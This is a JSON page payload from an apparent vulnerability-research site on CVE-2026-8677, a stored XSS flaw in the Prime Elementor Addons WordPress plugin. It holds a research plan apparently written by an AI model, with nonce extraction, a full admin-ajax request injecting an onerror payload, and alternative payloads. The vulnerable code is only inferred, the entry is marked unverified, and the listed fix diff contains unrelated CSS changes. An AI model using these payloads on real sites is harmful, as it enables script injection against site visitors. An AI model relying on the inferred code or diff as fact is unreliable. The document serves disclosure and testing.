[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fsrE7Jiyq3zNfFsYcTzlJcfUge-muyWgWhg5zf8FxjeU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-8677","prime-elementor-addons-authenticated-contributor-stored-cross-site-scripting-via-widget-html-tag-settings","Prime Elementor Addons \u003C= 1.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Widget HTML Tag Settings","The Prime Elementor Addons – Lightweight Elementor Widgets for Faster Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Widget HTML Tag Settings in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploit succeeds even for users without the unfiltered_html capability because the payload (e.g., 'img src=x onerror=alert(document.domain)') contains no HTML angle brackets and therefore passes through Elementor's wp_kses_post() filter unchanged at save time.","unlimited-elementor-inner-sections-by-boomdevs",null,"\u003C=1.3.3","1.3.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-06-08 19:49:58","2026-06-09 08:29:40",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F95136083-58d7-4ee4-b894-6910c3992d20?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fwidgets\u002Fpost-comment.css","assets\u002Fcss\u002Fwidgets\u002Fpost-meta.css","build\u002Fdashboard.asset.php","build\u002Fdashboard.css","build\u002Fdashboard.js","build\u002Ftemplatelibrary.asset.php","build\u002Ftemplatelibrary.css","build\u002Ftemplatelibrary.js","researched",false,3,"This research plan outlines the technical steps required to analyze and verify CVE-2026-8677, a Stored Cross-Site Scripting (XSS) vulnerability in the **Prime Elementor Addons** plugin.\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Stored Cross-Site Scripting (XSS) via Widget HTML Tag Settings.\n*   **Affected Plugin:** Prime Elementor Addons – Lightweight Elementor Widgets for Faster Pages.\n*   **Affected Versions:** \u003C= 1.3.3.\n*   **Root Cause:** Insufficient validation and escaping of the HTML tag setting in various Elementor widgets. The plugin allows users (with Contributor+ roles) to define the HTML wrapper tag (e.g., `h1`, `div`, `span`) for widget elements. If the input is not strictly validated against an allowlist, an attacker can provide a payload that breaks out of the tag context.\n*   **Bypass:** The vulnerability specifically bypasses `wp_kses_post()` (often used by Elementor) because the payload `img src=x onerror=alert(document.domain)` does not contain HTML angle brackets (`\u003C` or `>`). When the plugin echoes the tag as `\u003C$tag>`, the resulting output becomes `\u003Cimg src=x onerror=alert(document.domain)>`.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`.\n*   **Action:** `elementor_ajax`.\n*   **Internal Elementor Action:** `save_builder_data`.\n*   **Payload Parameter:** The `settings` object within the widget data in the `actions` parameter.\n*   **Preconditions:** \n    *   Plugin installed and active.\n    *   Elementor installed and active.\n    *   Attacker has at least `Contributor` privileges (allowing them to create\u002Fedit posts and access the Elementor editor).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** An authenticated user saves an Elementor page. This triggers an AJAX request to `admin-ajax.php` with `action=elementor_ajax`.\n2.  **Processing:** Elementor's AJAX handler processes the `save_builder_data` action, which contains the JSON-encoded layout and settings of the page.\n3.  **Storage:** The malicious \"HTML Tag\" setting (e.g., for the `pea_post_comment` widget) is stored in the post meta (usually `_elementor_data`).\n4.  **Sink:** When the page is viewed, the widget's `render()` method (likely in a class within `includes\u002Fwidgets\u002F`) retrieves the setting.\n5.  **Execution:**\n    ```php\n    \u002F\u002F Conceptual vulnerable code in the widget's render() method:\n    $settings = $this->get_settings_for_display();\n    $tag = $settings['title_tag']; \u002F\u002F Attacker provides: img src=x onerror=alert(1)\n    echo '\u003C' . $tag . '>' . $title . '\u003C\u002F' . $tag . '>';\n    ```\n    The output rendered in the browser becomes:\n    `\u003Cimg src=x onerror=alert(1)>Post Title\u003C\u002Fimg src=x onerror=alert(1)>`\n\n### 4. Nonce Acquisition Strategy\nTo simulate the Elementor save request, a valid nonce for the `elementor_ajax` action is required.\n1.  **Setup:** Create a page and open it in the Elementor editor as a Contributor.\n2.  **Extraction:** The nonce is stored in the `elementorCommon` JavaScript object.\n3.  **Tooling:** Use `browser_navigate` to open the editor, then `browser_eval`:\n    ```javascript\n    \u002F\u002F Extraction via browser console\n    window.elementorCommon.config.ajax.nonce;\n    ```\n4.  **Context:** This nonce is tied to the user's session and the `elementor_ajax` action.\n\n### 5. Exploitation Strategy\nThe goal is to update a post's Elementor data with a widget containing the malicious tag.\n\n*   **Step 1:** Create a new post and identify its `POST_ID`.\n*   **Step 2:** Obtain the `elementor_ajax` nonce using the strategy above.\n*   **Step 3:** Send a POST request to `admin-ajax.php`.\n\n**Request Details:**\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php?action=elementor_ajax`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```text\n    _nonce=[NONCE]&\n    actions={\n      \"save_builder_data\": {\n        \"action\": \"save_builder_data\",\n        \"data\": {\n          \"status\": \"publish\",\n          \"data\": [\n            {\n              \"id\": \"unique_id_1\",\n              \"elType\": \"section\",\n              \"elements\": [\n                {\n                  \"id\": \"unique_id_2\",\n                  \"elType\": \"column\",\n                  \"elements\": [\n                    {\n                      \"id\": \"unique_id_3\",\n                      \"elType\": \"widget\",\n                      \"widgetType\": \"pea_post_comment\",\n                      \"settings\": {\n                        \"title_tag\": \"img src=x onerror=alert(document.domain)\"\n                      }\n                    }\n                  ]\n                }\n              ]\n            }\n          ]\n        }\n      }\n    }&\n    post_id=[POST_ID]\n    ```\n*Note: `pea_post_comment` is inferred from `assets\u002Fcss\u002Fwidgets\u002Fpost-comment.css`. Other candidate widgets from the plugin (e.g., `pea_single_post_meta`) should also be tested.*\n\n### 6. Test Data Setup\n1.  **User:** Create a user with the `Contributor` role.\n2.  **Post:** Create a draft post as the Contributor.\n3.  **Environment:** Ensure Elementor is active so the `elementor_ajax` action is registered.\n\n### 7. Expected Results\n*   **AJAX Response:** The server should return a JSON response indicating success: `{\"success\":true,\"data\":{...}}`.\n*   **Frontend Rendering:** Navigating to the post's public URL will trigger the XSS. The browser's DOM will contain:\n    `\u003Cdiv class=\"pea-single-post-comments-wrapper ...\"> \u003Cimg src=x onerror=alert(document.domain)> ... \u003C\u002Fdiv>`\n*   **Execution:** An alert box showing the document domain will appear.\n\n### 8. Verification Steps\n1.  **WP-CLI Check:** Verify the stored meta data:\n    ```bash\n    wp post meta get [POST_ID] _elementor_data\n    ```\n    Confirm the `title_tag` value contains the payload.\n2.  **HTML Inspection:** Use the `http_request` tool to fetch the public page and grep for the payload:\n    ```bash\n    # Look for the broken-out img tag\n    http_request(url=\"http:\u002F\u002F\u003Ctarget>\u002F?p=[POST_ID]\") | grep \"onerror=alert\"\n    ```\n\n### 9. Alternative Approaches\n*   **Different Widgets:** If `pea_post_comment` does not have a tag control, check other Prime Addons widgets like `pea_single_post_meta` (from `assets\u002Fcss\u002Fwidgets\u002Fpost-meta.css`) or any \"Heading\" \u002F \"Title\" widgets included in the plugin.\n*   **Attribute Injection:** If the tag is escaped but the attribute context is not, try payloads like `div onmouseover=alert(1)`.\n*   **Global Settings:** Check if the plugin provides global settings for HTML tags in the WordPress dashboard (Admin XSS).","The Prime Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via widget HTML tag settings in versions up to 1.3.3. Authenticated attackers with Contributor-level access can inject malicious scripts into various widgets because the plugin fails to sanitize or validate user-defined wrapper tags, allowing payloads without angle brackets (like 'img src=x onerror=alert(1)') to bypass filters and execute in the browser.","\u002F\u002F Conceptual vulnerable code in the widget's render() method (e.g., pea_post_comment or pea_single_post_meta)\n\u002F\u002F Inferred from research plan sections 3 and 5\n\n$settings = $this->get_settings_for_display();\n$tag = $settings['title_tag']; \u002F\u002F Attacker provides: img src=x onerror=alert(document.domain)\necho '\u003C' . $tag . '>' . $title . '\u003C\u002F' . $tag . '>';","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Funlimited-elementor-inner-sections-by-boomdevs\u002F1.3.3\u002Fassets\u002Fcss\u002Fwidgets\u002Fpost-comment.css \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Funlimited-elementor-inner-sections-by-boomdevs\u002F1.3.4\u002Fassets\u002Fcss\u002Fwidgets\u002Fpost-comment.css\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Funlimited-elementor-inner-sections-by-boomdevs\u002F1.3.3\u002Fassets\u002Fcss\u002Fwidgets\u002Fpost-comment.css\t2026-05-22 10:29:18.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Funlimited-elementor-inner-sections-by-boomdevs\u002F1.3.4\u002Fassets\u002Fcss\u002Fwidgets\u002Fpost-comment.css\t2026-06-01 05:12:36.000000000 +0000\n@@ -5,6 +5,9 @@\n     border-radius: 4px;\n     padding: 0;\n }\n+.pea-single-post-comments-wrapper input[type=email], .pea-single-post-comments-wrapper input[type=text], .pea-single-post-comments-wrapper input[type=url], .pea-single-post-comments-wrapper textarea {\n+    border: none;\n+}\n [data-widget_type=\"pea_post_comment.default\"] .pea-single-post-comments-wrapper.comments-area::before {\n     background: unset;\n }\n@@ -75,6 +78,8 @@\n     -ms-flex-direction: row;\n     flex-direction: row;\n     align-items: center;\n+    margin-bottom: 0;\n+    margin-block-end: 0px;\n }\n .pea-single-post-comments-wrapper.comments-area img.avatar {\n     border-radius: 60%;\n@@ -116,8 +121,9 @@\n     transition: 0.3s ease-in-out 0s;\n }\n .pea-single-post-comments-wrapper.comments-area .reply a:hover {\n-    background: #135e96;\n-    border-color: #135e96;\n+    background: transparent;\n+    border-color: transparent;\n+    text-decoration: underline;\n }\n .pea-single-post-comments-wrapper form p {\n     margin-top: 0;","1. Authenticate as a Contributor user and access the Elementor editor for a post.\n2. Obtain an 'elementor_ajax' nonce from the editor environment (e.g., from the 'window.elementorCommon.config.ajax.nonce' object).\n3. Send an AJAX request to \u002Fwp-admin\u002Fadmin-ajax.php with action=elementor_ajax and the 'save_builder_data' operation.\n4. In the 'save_builder_data' payload, include a Prime Elementor Addon widget (such as 'pea_post_comment') with its 'title_tag' setting set to a malicious payload like 'img src=x onerror=alert(document.domain)'.\n5. Since the payload contains no angle brackets (\u003C or >), it bypasses wp_kses_post() filtering during the save process.\n6. When any user views the post, the plugin renders the widget, outputting the payload inside an angle-bracketed tag context, resulting in executed JavaScript.","gemini-3-flash-preview","2026-06-26 01:53:13","2026-06-26 01:54:17",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.3.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Funlimited-elementor-inner-sections-by-boomdevs\u002Ftags\u002F1.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Funlimited-elementor-inner-sections-by-boomdevs.1.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Funlimited-elementor-inner-sections-by-boomdevs\u002Ftags\u002F1.3.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Funlimited-elementor-inner-sections-by-boomdevs.1.3.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Funlimited-elementor-inner-sections-by-boomdevs\u002Ftags"]